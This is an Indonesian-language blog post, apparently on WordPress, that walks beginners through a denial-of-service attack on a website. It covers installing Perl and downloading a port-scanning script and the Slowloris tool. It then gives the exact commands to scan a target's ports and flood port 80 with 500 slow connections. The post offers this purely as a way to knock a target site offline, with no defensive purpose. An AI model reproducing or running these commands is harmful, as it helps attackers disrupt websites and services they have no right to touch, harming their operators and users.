Ddos for Newbie

Perhatikan perbedaan DDOS dan DOS:

  • ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan bisa dimanfaatkan untuk serangan
  • dos adalah serangan yang berasal hanya dari 1 mesin saja!!!

Nah yang mau ane bahas disini hanya penyerangan lewat satu komputer doank, tapi tetap aja ane beri judul “dDoS For Newbie”,
soal’a anak-anak biasa bilang dDoS aja low kita mau nyedot web target kita. Tapi terserah deh, gimana ahlinya aje… hahaha (lw ane paling cuma bisa pake doank… wkwkwkwk)

Ok cuy !!!
Sebelum kita melakukan dDoS terlebih dahulu komputer kita musti bisa menjalan skrip bahasa PERL, low ane cie pake software “Strawberry Perl 5.12.0.0”. Software’a banyak tuh di google, ukuran’a 39Mb doank cuy.
Setelah terinstal kita download dulu tool buatan om dom yang fungsi’a untuk mengetahui port mana yang terbuka di target kita.
Silahkan Download’a disini :

jasakomtool.pl“.

Lalu download juga tool dDoS’a disini :

slowloris.pl“.

Atau langsung aja nih download kedua’a :

Dua-dua’a cuy

Nah setelah ntu simpen di diroktory dimana kamu mau meng-Eksekusi’a. Misal ane simpen di direktory “Tolls” –>> c:\tool.
Lw udah jalankan CMD’a :
Tadi kan nyimpen’a di Direktory C:\tools, maka untuk menjalankan tool itu ketik di CMD dengan command “c:\tools” lalu enter.
Hmmm…. Sekarang kita siap menggunakan tool yang telah kita download tadi.

Oke sekarang ikuti step by step di bawah ini :

  1. perl jasakomtool.pl -portscan http://www.target.com 70 90 <<— (ketik di CMD ya) Untuk mencari tau port yang terbuka antara port 70 sampai port 90, biasa’a kita mencari target port 80 yang terbuka.
  2. wo0t !!! Ternyata port 80 terbuka cuy <<<—- Entar kita serang lewat port ini
  3. perl slowloris.pl -dns http://www.target.com -port 80 -timeout 30 -num 500 -cache <<— Enter dan mulai deh dDoS berjalan

Sip deh cuy… Ampe sini kita tinggal tunggu reaksi’a doank….


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s